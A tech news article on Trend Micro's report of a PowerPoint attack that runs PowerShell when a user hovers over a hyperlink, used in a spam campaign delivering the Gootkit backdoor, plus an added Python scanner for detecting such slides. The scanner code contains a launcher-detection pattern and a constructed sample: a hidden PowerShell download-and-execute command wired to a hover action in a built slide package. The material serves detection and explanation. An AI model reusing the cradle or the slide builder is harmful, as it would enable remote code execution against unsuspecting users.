A mouseover is enough for the malware to strike: a new threat targeting PowerPoint

Trend Micro security researchers have identified a new malware attack that triggers when the user simply hovers the mouse pointer over a hyperlink in a specially crafted PowerPoint file, without clicking anything. The method was used in a spam campaign that tried to install a banking-fraud backdoor known as Zusy, OTLARD or Gootkit.

The malware is notable because it does not rely on macros, Visual Basic or JavaScript scripts, the vehicles that are normally used and that often get a threat recognized before it can do damage. The technique instead leverages Windows PowerShell, which is invoked when the target moves the mouse pointer over a hyperlink inside the PowerPoint document.


Source: TrendMicro
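
The mechanism described above leaves a trace in the document itself, and that is where a defender can look before the file ever reaches PowerPoint. The following scanner is an added example and is not code from Trend Micro or from this article. It assumes the standard PresentationML layout for hover actions: a text run carrying an `a:hlinkMouseOver` element with `action="ppaction://program"` whose `r:id` points, through the slide's `.rels` part, at an external hyperlink relationship whose `Target` is the command line to run. The sample package it builds, the PowerShell download command and the `example.invalid` URL are all constructed placeholders, not a real sample.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import quoteattr

A_NS = "http://schemas.openxmlformats.org/drawingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# Built-in Windows launchers that a hyperlink "program" action would typically start.
LAUNCHER = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil)(\.exe)?\b", re.I
)

# Constructed placeholder command (not a real sample): a hidden PowerShell download cradle.
SAMPLE_COMMAND = (
    "powershell -NoP -NonI -W Hidden -Exec Bypass "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://downloader.example.invalid/x')\""
)


def build_sample_ppsx(command: str) -> bytes:
    """Build a minimal, constructed PresentationML package (assumed layout) with one slide:
    a text run whose hover action (a:hlinkMouseOver, action="ppaction://program") resolves
    through the slide's .rels part to `command`, plus one benign click hyperlink."""
    slide_xml = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"
       xmlns:a="{A_NS}" xmlns:r="{R_NS}">
  <p:cSld><p:spTree>
    <p:sp><p:txBody>
      <a:p><a:r>
        <a:rPr lang="en-US"><a:hlinkMouseOver r:id="rId2" action="ppaction://program"/></a:rPr>
        <a:t>Loading... Please wait</a:t>
      </a:r></a:p>
      <a:p><a:r>
        <a:rPr lang="en-US"><a:hlinkClick r:id="rId3"/></a:rPr>
        <a:t>Terms and conditions</a:t>
      </a:r></a:p>
    </p:txBody></p:sp>
  </p:spTree></p:cSld>
</p:sld>"""
    rels_xml = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId2" Type="{R_NS}/hyperlink" Target={quoteattr(command)} TargetMode="External"/>
  <Relationship Id="rId3" Type="{R_NS}/hyperlink" Target="https://example.com/terms" TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("ppt/slides/slide1.xml", slide_xml)
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


def scan_presentation(data: bytes) -> list:
    """Return one finding per slide hyperlink whose hover or click action launches a
    program, or whose resolved target looks like a command line. Resolves r:id through
    each slide's .rels part. Applies to .pptx/.ppsx/.ppsm alike, since all are OOXML zips."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        for part in sorted(names):
            if not re.fullmatch(r"ppt/slides/slide\d+\.xml", part):
                continue
            rels_part = part.replace("ppt/slides/", "ppt/slides/_rels/") + ".rels"
            targets = {}
            if rels_part in names:
                for rel in ET.fromstring(z.read(rels_part)).iter(f"{{{REL_NS}}}Relationship"):
                    targets[rel.get("Id")] = rel.get("Target", "")
            slide = ET.fromstring(z.read(part))
            for tag, trigger in (("hlinkMouseOver", "mouseover"), ("hlinkClick", "click")):
                for link in slide.iter(f"{{{A_NS}}}{tag}"):
                    action = link.get("action", "")
                    target = targets.get(link.get(f"{{{R_NS}}}id"), "")
                    # A "program" action is suspicious on its own; a launcher in the
                    # target is suspicious even when the action attribute is absent.
                    if action.startswith("ppaction://program") or LAUNCHER.search(target):
                        findings.append(
                            {"part": part, "trigger": trigger, "action": action, "target": target}
                        )
    return findings


if __name__ == "__main__":
    for f in scan_presentation(build_sample_ppsx(SAMPLE_COMMAND)):
        print(f"{f['part']}: on {f['trigger']} -> {f['action'] or 'hyperlink'} :: {f['target']}")
```

Two design points: the scanner flags a `ppaction://program` action regardless of what the target is, because a slide has no legitimate reason to launch a program on hover, and it also flags a target that names a launcher even without that action, which catches a variant that relies on the click instead of the hover. Both triggers are inspected because Trend Micro's variant fires on mouseover, but the same relationship could just as well be wired to `a:hlinkClick`. Because the check is static, it works on mail-gateway attachments before any PowerShell process is spawned, independently of Protected View.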
Protected View, present in recent versions of Microsoft Office, can give the user a first warning. Its effectiveness may be particularly low, however: the user can be induced to leave the mode (documents cannot be printed or edited while it is active) or, in the case of less experienced users, a careless click on “Enable” removes this last possible barrier to infection. Protected View is also not available in older versions of Office.

As mentioned above, this new threat was used in a spam campaign launched towards the end of May. Spam campaigns carrying malicious attachments often hit with a firepower of tens of millions of messages in a few hours.

The messages use subjects such as Purchase Order, Invoice and Confirmation, and naturally carry a PowerPoint attachment under a variety of file names. The peak of the campaign was observed on May 25th with 1,444 detections. At present it is unclear what the success rate of this technique may be, but even a 0.5% rate could pose a major threat to companies and individuals around the world, especially those who use older versions of Office.

A detailed technical analysis of the threat is available on the official Trend Micro blog at this address.

Selina


I breathe tech! Want to get me to talk about something else? Then try movies.